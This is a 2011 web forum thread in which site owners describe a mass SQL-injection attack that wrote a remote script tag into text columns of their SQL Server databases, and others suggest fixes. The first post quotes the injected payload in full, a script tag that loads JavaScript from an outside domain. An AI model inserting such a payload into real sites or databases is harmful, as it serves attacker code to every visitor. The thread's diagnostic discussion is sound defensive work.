Get Help:Ask a Question in our Forums|Report a Bug|More Help Resources
Last post Apr 07, 2011 12:24 PM by timtatum
Mar 27, 2011 10:02 AM|LINK
My database was inserted a string like "</title><script src=http://lizamoon.com/ur.php></script>". Event the username field in aspnet_users table. So now I can't login my website if I use asp.net security. Who know about this problem please tell me what
happening with my database or my website. And how can I fix it ? Thanks all!
Mar 27, 2011 06:32 PM|LINK
Does your signup page have validaterequest="false" in the top of your page?
If you have disabled request validation (for example to allow certain rich text boxes to accept html input on the page) then you might have opened up a security hole which has allowed somebody to signup with spammy names?
On possible way to prevent this in future would be to put a regularexpression validator on your username textbox on the signup page.
You will need to connect to your database and manually clean out the rouge records so that you can login as well.
I would also recommend installing elmah which will log any errors occuring on the site and could give you a heads up to people attacking your site:
Mar 28, 2011 08:34 AM|LINK
Same problem. Did you find a solution?
Mar 28, 2011 08:44 AM|LINK
Hi don't think It's a signup problem. All database usernames are corupted even old one.
Mar 28, 2011 09:26 AM|LINK
Mar 28, 2011 10:08 AM|LINK
This appeared on my ASP site on Friday, I have removed all instances I can find of it. However, I still want to know why this has happened as I have another two ASP sites an one ASP.NET site.
The common thing between all my sites is that they use a SQL Server database.
I have also found the whois details of lizamoon.com and it comes up with rubbish, view it here:
Mar 28, 2011 11:38 AM|LINK
Hit one of my sites as well. Written in Cold Fusion but running a SQL Server database.
Hit multiple tables and various columns in the database.
Mar 28, 2011 12:02 PM|LINK
After a bit more investigation and clearing out my database, it has only been added to fields that are either 'text' or 'nvarchar' data types.
If you do a google search for part of the script url it shows up a lot of sites that have been inffected. Alsdo have notice that one of the sites is displaying 'Alert: This Site has been hit with the Liza Moon SQL Injection Attack!'
Anyone found out how, why this has happen and anyway to stopping it happening again.
Mar 28, 2011 12:40 PM|LINK
We've been attacked too - exactly the same symptoms - anyone figured out how they got in yet???
Mar 28, 2011 01:14 PM|LINK
One our sql 2005 database was attacked last Friday. Only some fields ntext or varchar have been modified. We use tiny_mce for html insert by asp.net pages into sqlserver db